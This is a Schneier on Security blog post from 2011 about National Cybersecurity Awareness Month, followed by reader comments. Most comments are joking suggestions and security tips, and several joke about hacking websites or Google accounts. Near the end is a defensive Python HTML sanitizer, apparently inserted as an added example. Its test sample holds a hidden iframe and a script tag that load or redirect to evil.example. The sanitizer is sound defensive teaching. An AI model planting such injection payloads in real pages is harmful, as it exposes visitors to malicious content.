Schneier on Security
A blog covering security and security technology.
October 4, 2011
National Cybersecurity Awareness Month
October is National Cybersecurity Awareness Month, sponsored by the Department of Homeland Security. The website has some sample things you can do to celebrate, but they're all pretty boring. Surely we can do better. Post your suggestions in comments.
Posted on October 4, 2011 at 6:31 AM
Hack a government website and replace the frontpage with the message: "Happy sibursekurity monht! No UFO information here."
Hack the "National Cybersecurity Awareness Month" website and add a check-your-password-strength and a see-if-your-creditcard-is-stolen module. All entered information is of course 'handled confidentially'. :)
Bad thing is that it takes some attention away from the fact that October has been National Breast Cancer Awareness Month for the last 25 years. People with short and narrow attention spans cannot concentrate on both.
I will disconnect all my desktops and laptops from ethernet/wifi and delete the GPRS config on my phone for the whole month to ensure that I fulfill my role in securing cyberspace...
Hand out bottles of Mezcal with a worm in it to celebrate all the people who prevent internet worms from propagating.
As you can see I definitely will be preventing "internet worms from propagating" (as per my comment immediately above yours)...
So where's my bottle?
@Nano: Hack the "National Cybersecurity Awareness Month" website and add information about breast cancer.
It's also breast cancer hysteria month. Looks like DHS/TSA celebrated that enough this week what with forcing a titrot survivor to have her scars groped and examined in public. Jesse Ventura's lawsuit is going nowhere; she doesn't stand a chance. Okay, I'll make an extra backup of data, go store it offsite.
@Nano: I think nobody really knows what "awareness month" any given month is as they're trivial and serve virtually no purpose. For breast cancer, AIDS, cyber-security and virtually everything else, there should be constant awareness not just for a given period of time; it's almost as if it's intended to be a joke.
Why are "awareness" months and other such garbage a joke? Well, what else is October?
It's also ...
Adopt a Shelter Dog Month
American Pharmacist Month
Apple Jack Month
Breast Cancer Awareness Month
Clergy Appreciation Month
Computer Learning Month
Domestic Violence Awareness Month
Eat Country Ham Month
International Drum Month
Lupus Awareness Month
National Diabetes Month
National Pizza Month
National Vegetarian Month
National Popcorn Popping Month
National Fire Safety & Prevention Month
National Reading Group Month
... and probably other stupid stuff.
BTW, my idea to celebrate this very important awareness issue for the month is to throw a pizza party with breast cancer survivors and show them how to set a proper password for their pharmacy website.
"The website has some sample things you can do to celebrate, but they're all pretty boring."
Of course they are boring for two important reasons:
1. You must not cause the sheeple to get excited in any way, they might panic and start thinking.
2. This is the Department of Hapless Stupidity whose two strengths are "we haven't a clue" and "we are the world's largest bureaucracy".
Anyway, how about a song to celebrate?
As Louis Armstrong once sang (Sit down, you're Rocking the Boat),
I dreamed last night I got on the boat to Heaven,
And by some chance I had brought my dice along,
And there I stood, and I hollered, "Someone fade me",
But the passengers they knew right from wrong
For the people all said "Sit down, sit down you're rockin' the boat."
And the people all said "Sit down, sit down you're rockin' the boat"
And the devil will drag you under By the sharp lapel of your checkered coat,
Sit down, sit down Sit down you're rocking the boat....
"Bad thing is that it takes some attention away from the fact that October has been National Breast Cancer Awareness Month for the last 25 years. People with short and narrow attention spans cannot concentrate on both."
And breast cancer awareness will save a lot more lives.
They should teach crypto to the general public.
Symmetric, asymmetric, convergent encryption (just read about Bitcasa ;), web of trust, steganography, RSA blinding, zero knowledge protocols, etc...
It's more fun than most people think!
Put some demonstration cross site scripting attacks and malware downloads that will post content to Facebook, transfer $1 to breast cancer funds, and take pictures with their webcam and email it back to them. That should make people uncomfortably aware of how vulnerable they are. And the record donations for breast cancer will provide accurate statistics on how many got infected by the malware.
Celebrate like Jack Bauer!
Don't wear a bra. Encrypt your shirt.
A demonstration hack like the one described by @Gabriel would be like fluxnet.
Teaching cryptography and security concepts sounds reasonable; things like easy-and-yet-secure password choosing (e.g. four random common words), basics like ROT13 and so on, can be fun.
In Germany there are theme years and days: 2006 was the year of computer science :) Yesterday was German-Unity-Day, hurra!
53qdy 6974 i8ew gqw8d d60y34w:
Actually I go and talk with school kids about technology safety. Not just the short-term stuff like not telling complete strangers you are alone at home, but the longer-term things that can impact your career. Plausibly not what the creepy-named DHS had in mind, but safety is security.
Why should we celebrate or contribute?
There's obviously a huge marketing budget available to DHS. So, the marketing/consulting firm responsible for inventing the cyber-BS-awareness-month should celebrate: without any contribution to society they managed (most likely) to extract a fortune from the general public while giving DHS officials this special feeling of importance, relevance, and greatness.
[which, on some level, implies that the work of people sub-contracting in the DHS is close to the work of psychologists ... keeping this warm, comfy feeling alive for those in demand]
Good to hear it is Sarcastic Month. I shall try my utmost to uphold the sanctity of such an important event. I believe it will also improve my Cybersecurity Awareness substantially.
And a happy 10-4 day to everybody too!
@ Joe Dietz,
"Plausibly not what the creepy-named DHS had in mind, but safety is security"
In some European languages (French, for instance) they do not have separate words for "safety" and "security".
@ Roger that,
Silly programmer trivia...
In the UK dates are given as dd/mm/yy the first of Oct this year was the same as 1 2 3 in binary (01/10/11)
Since it is also "Hispanic" month (officially "Hispanic" month begins on September 15, but, well, it covers part of October), it could be combined with something like "let's adopt a 'Hispanic' in Alabama".
@AC2 - except, you clearly haven't followed through...
These things always remind me of National Brotherhood Week
National Cybersecurity Awareness Month activity-a-day calendar
Day 1. google your own name
Day 2. google all your email addresses
Day 3. google all your telephone numbers
Day 4. google map your residence. Also check streetview. When did they take those pictures?
Day 5. Make a list of all your on-line accounts
Day 6. List the passwords for your accounts. How many accounts share the same password?
Day 7. Find your browser cache. Take a look. See what is there.
Day 8. Find out how to clear your browser history/cache/cookies
Day 9. Find all the cookies on your web browser. How many of the domain names do you recognize?
Day 10. Clear all the cookies on your web browser. Check back every day. How long does it take for them to return?
Day 11. Set your browser to refuse all cookies. Try to browse the web.
Day 13. Pick an account or service that you no longer use/need. Try to close/delete/eradicate it.
Day 14. Lower your attack profile. Pick a high-profile app (IE/Outlook/Acrobat/etc..) and switch to a lower-profile equivalent (FF/Thunderbird/Foxit/etc...)
Day 15. Find the number of people killed each year by computers. Compare with the number killed by automobiles.
Day 16. Locate all the executable programs on your computer.
Day 17. List all the vendors that those programs came from.
Day 18. List all the countries that those programs came from.
Day 19. Find a work that isn't under copyright. Copy it.
Day 20. Enter a bill into wheresgeorge.com. Release it into the wild and track it on-line.
Day 21. Create an email address somewhere. Never use it. See how much SPAM it accumulates.
Day 22. Do a tracepath to your favorite site or service. How many machines get their hands on your data between here and there?
Day 23. Connect a machine with a common OS to the internet. Measure mean time to compromise.
Day 24. Run crack against all your encrypted passwords
Day 25. Run a port scan on your own IP address
Day 26. Do a security audit of your own computer
Day 27. Walk a tablet/netbook/PDA around your wireless access point and map its range
Day 28. Go wardriving with a friend. How many wireless access points can you find? How many are unsecured?
Day 29. Scavenge some drives from the $5 bin at your local computer surplus store. Plug them in. See what is on them.
Day 30. Read Ken Thompson--Reflections on Trusting Trust. Do you understand the attack? Do you care?
Day 31. (Halloween) Create an on-line identity that isn't publicly tied to your real name. Masquerade on-line in that persona.
To be taken about as seriously as an ad for Hyacinth Bucket's famous candle light suppers: a non-event meant to distract people from stuff that actually matters. Like Amanda Knox. Or the trial of MJ's little propofol helper.
If the DHS were to be concerned in any way about raising citizens' awareness of what's really happening in the country, they'd be reporting about #OccupyWallStreet.
"Day 1. google your own name
Day 2. google all your email addresses
Day 3. google all your telephone numbers
Day 4. google map your residence. Also check streetview. When did they take those pictures?"
And this is in order to make sure Google knows who you are, where you live and how to contact you? :)
Re: Day 4
And keep that vehicle in the garage with the garage door closed so Google, and the rest of the world, doesn't know what kind of vehicle you drive.
Honestly, the only way to celebrate National Cybersecurity Awareness Month would be to dismantle the Department of Homeland Security and the Transportation Security Administration and spend some of the money saved on better intelligence to prevent attacks, reduce security levels back to pre-9/11 levels, and have security response teams ready to react to threats and emergencies instead.
This way people could go to the airport again without being molested and their belongings being stolen. Another additional benefit would be that the sponsor for this month-long event would be eliminated and give attention back to something that is a higher risk to individuals and more important, like Breast Cancer Awareness.
@Steven: Trusting Trust, that's always been one of my favorites. And where trusted computing falls flat, especially at the consumer level, such as Microsoft's "secure boot" in Win 8. To begin with, you have to trust your mobo maker, UEFI writer, and Microsoft. The first two are the weakest links.
Break into Google, then have a bot find the most embarrassing email in each account and forward it to all the user's contacts; if it can't find one, it makes one up. Have the bot run on compromised EC2 accounts so that it's 'web scale'. It could make loads of people aware of security in just a few hours.
Odd. It's the same month in Canada...
@Clive Robinson: Perhaps most amusing is that Czech has no word for "safety," instead the only formulation for that concept is "not dangerous."
I've just got an email from Amazon Web Services, which celebrates the event quite well.
The email's topic announced a "Server Side Encryption" sub-service for their cloud-based data storage service named S3 (I use it for backups - encrypting on MY side of course). Nonsense, I thought at first. If I hand them my plaintext data for encryption on their side - it's nonsense because they have already seen the plaintext, so I have to trust them not to reveal it anyway, regardless of whether they store it encrypted or not. If I hand them data encrypted by me - it's useless.
Reading on, I had a good laugh. To enable the feature you just have to "set the “Use Server Side Encryption” checkbox property" in the web console or enable encryption "simply by adding an additional request header" (checking the dev guide: the header specifies the encryption algorithm only and not the key). The new service "employs strong multi-factor [sic!] encryption" and each file is "encrypted with a unique key" which "is itself encrypted with a regularly rotated master key". For now, they offer AES-256 only. Security theater indeed.
Reading further on I realized that AWS guys aren't really that dumb, only cynical - they just try hard to sell their stuff to "customers seeking to comply with certain regulations such as PCI and HIPAA". The use of buzzwords out of context confirms that. This is *literally* the checklist-type security mocked so many times on this blog by security auditing practitioners.
Hmmm...Breast Cancer Awareness month AND Cybersecurity Awareness Month? Maybe there's some way to connect breasts and the cyber world. Let me think about this...
@Munchma Qutchi: Latest news! Computer viruses can cause breast cancer!
How about an attack on networked digital mammography machines to blend the awareness months? Something like
SET #Plate_Pressure as %MAX
SET #Scan_Time as 2.0 hours
might get some attention.
According to today's "Blondie" comic, October is also "Cookie Month". I know which month I will be celebrating ...
Why is Cybersecurity month in October? Because it's Federal budget season in Congress.
It's also celiac awareness month, so write some new sigs for your IPS to drop connections containing wheat, barley, rye and sometimes oats.
NOTE: The following ideas for cyber security (if there truly is any such thing) may be considered electronic blasphemy by the First Deformed Church of Science (Fiction), as well as most of the sheeple in the mainstream.
Besides the most obvious of using a good-quality (automatically excludes McAfee and Symantec) antiviral package on your system, AND keeping it up to date, I present what I think may be the Seven Habits of Highly Successful Tech Users.
(1) Don't use Internet Explorer. Period.
(2) Use Firefox. Install AdBlock Plus, NoScript, BetterPrivacy, and FlashBlock. THINK before you allow a script to execute.
(3) Don't participate in "social networking." Facebook, MySpace, and the others are nothing more than enormous time-sucks and information sinkholes.
(4) Learn how to use personal social skills instead. Learn how to 'read' people (yeah, I know... scary, but well worth it!)
(5) A little paranoia is always a Good Thing.
(6) "Smart" phones are anything but. You have the smarts. The phone is merely a computer, and just as much a potential security leak as your desktop or laptop. Treat it as such!
And, what I think may be the hardest one of all for many...
(7) Your brain, and the critical thinking it can provide if properly used, are the best possible security tools you have. Learn how to use them!
In other words: Don't be stupid. ;-)
Mr. Bruce/KC7GR, your suggestions sound generally valid. However, one quibble is that I would NOT recommend you use the "FlashBlock" extension. Now that NoScript has implemented a far more secure form of flash blocking functionality, there is no reason to use FlashBlock--the method it uses to deny flash unless enabled is intended for annoyance blocking, not security, and can be exploited rather easily, unlike rapidly updated and extremely secure NoScript. FlashBlock is worse than useless for security, as simply having it installed increases one's attack surface if it develops any vulnerabilities. See the article here: http://hackademix.net/2008/06/08/block-rick/ Warning: If you use Flashblock as your flash blocker, you are about to see ole' Rick do his rolling.
I use the following privacy/security extensions on FF6/7 running on Mac, Windows, and Linux (FYI--If you have to pick only one, then get NoScript and LastPass (yes, that's two, but between those two you can't go wrong)).
To make the most effective use of these, always patch your browser and addons frequently, use permanent private browsing mode, and disable any plugins or functionality you don't need (i.e. Java, RealPlayer, Silverlight, etc). I recommend you always leave these off, but QuickJava (below) makes it easy to toggle them.
Thus (top category picks bolded, top 2 overall underlined):
Malicious Site/Link Protection:
• AVG LinkScanner
• Link Alert
Web Site Security:
• HTTPS Everywhere
• Gmail S/MIME
• MD5 Reborned Hasher
Cross Site Request Security:
• Redirect Remover
• ABP w/EasyList+Privacy, and Fanboy's with P2P, Tracking, Stats, Object Dimensions, and Annoyance blocking
• ABP Popup Addon
• Beef TACO
I use all of them every day on Mac, Windows, and Linux without major web browsing troubles. Of course, the safest solution is to run FF with those extensions in a Linux virtual machine, like I do, and only download things in your real browser once you have downloaded and verified their integrity in Linux.
Those are just some suggestions, and adding such browser extensions is only a partial defense against one attack vector. However, it will stop a fairly hefty percentage of web-based attacks in their tracks. Happy browsing, folks, and good luck out there...trust me, without a comprehensive security plan, you WILL need it.
I just visited stayingsafeonline.org to view their tips and found they have a blog post stating, in part:
On October 10th National Cyber Security Alliance discovered that staysafeonline.org had become the victim of a malicious iframe injection resulting in malicious content potentially being delivered to visitors to the website.
If you visited staysafeonline.org between October 5 – 11 there is a chance that your system may have been exposed to malicious content.
Filtering posts for IFRAMES is pretty standard stuff...
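The "standard stuff" the comment above refers to, as an added example (not code from the page, from the NCSA site, or from this blog): an allow-list sanitizer for user-submitted HTML fragments. It goes a little beyond filtering `<iframe>` alone, because the same injection path carries `<script>`, `<object>`, `<embed>`, inline event handlers and `javascript:` links; anything not explicitly allowed is removed. The tag and attribute allow-lists, the `sanitize` function and the sample post are all constructed for this illustration and assume posts are stored as HTML fragments and rendered without further escaping.

```python
"""Allow-list HTML sanitizer for user-submitted post bodies (added example).

Assumption: post bodies are stored as HTML fragments and echoed back to
every visitor unescaped, so whatever survives this function is what the
browser executes. Only Python's standard library is used.
"""
from html import escape
from html.parser import HTMLParser

# Tags a post is allowed to keep; every other tag is stripped (its text is kept).
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "a", "ul", "ol", "li",
                "blockquote", "code", "pre"}
# Attributes allowed per tag. style=, on*=, src=, ... are never listed, so never survive.
ALLOWED_ATTRS = {"a": ("href", "title")}
# Elements whose *content* is discarded too. <iframe> is the vector described in
# the NCSA notice; the rest are its usual companions in an injection payload.
DROP_CONTENT_TAGS = {"iframe", "script", "style", "object", "embed",
                     "noscript", "svg", "math", "frame", "frameset"}
# Link targets that may stay; "javascript:", "data:", "vbscript:" etc. are dropped.
SAFE_HREF_PREFIXES = ("http://", "https://", "mailto:", "/", "#")
VOID_TAGS = {"br"}


def _safe_href(value):
    return (value or "").strip().lower().startswith(SAFE_HREF_PREFIXES)


class Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []          # sanitized output fragments
        self.open_tags = []    # allowed tags currently open, for balanced closing
        self.drop_stack = []   # nesting while inside a dropped element
        self.dropped = []      # audit trail: which dangerous elements were removed

    def handle_starttag(self, tag, attrs):
        if self.drop_stack or tag in DROP_CONTENT_TAGS:
            if tag in DROP_CONTENT_TAGS:
                self.dropped.append(tag)
            if tag not in VOID_TAGS:
                self.drop_stack.append(tag)
            return
        if tag not in ALLOWED_TAGS:
            return  # unknown tag (div, img, ...): drop the tag itself, keep its text
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, ()):
                continue
            if name == "href" and not _safe_href(value):
                continue
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if self.drop_stack:
            if tag in self.drop_stack:          # leave the dropped region
                while self.drop_stack.pop() != tag:
                    pass
            return
        if tag in self.open_tags:               # close up to and including this tag
            while True:
                open_tag = self.open_tags.pop()
                self.out.append(f"</{open_tag}>")
                if open_tag == tag:
                    break

    def handle_data(self, data):
        if not self.drop_stack:                 # re-escape text; comments are never emitted
            self.out.append(escape(data, quote=False))

    def result(self):
        while self.open_tags:                   # close anything the author left open
            self.out.append(f"</{self.open_tags.pop()}>")
        return "".join(self.out)


def sanitize(fragment):
    """Return (clean_html, dropped_tags) for a user-submitted HTML fragment."""
    parser = Sanitizer()
    parser.feed(fragment)
    parser.close()
    return parser.result(), parser.dropped


# Constructed sample post: a benign body with an injected hidden iframe, an
# inline event handler, a javascript: link and a script block mixed in.
SAMPLE_POST = (
    '<p>Stay safe online!</p>'
    '<iframe src="http://evil.example/exploit.html" width="0" height="0"></iframe>'
    '<p onmouseover="alert(1)">Tips <a href="javascript:alert(1)">here</a> '
    'and <a href="https://example.org/tips" title="t">here</a>.</p>'
    '<script>document.location="http://evil.example"</script>'
    '<b>Bold</b> & done'
)

if __name__ == "__main__":
    clean, dropped = sanitize(SAMPLE_POST)
    print(clean)
    print("removed:", dropped)
```

The `dropped` list is worth logging: a sudden rise in removed `iframe` or `script` elements across submissions is exactly the signal that would have flagged the injection the NCSA notice describes days earlier.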
@Steven - thanks for the great list. I'm "borrowing" it, with a few minor tweaks, for the cyber safety class I teach to kids. I hope you don't mind.
Schneier.com is a personal website. Opinions expressed are not necessarily those of BT.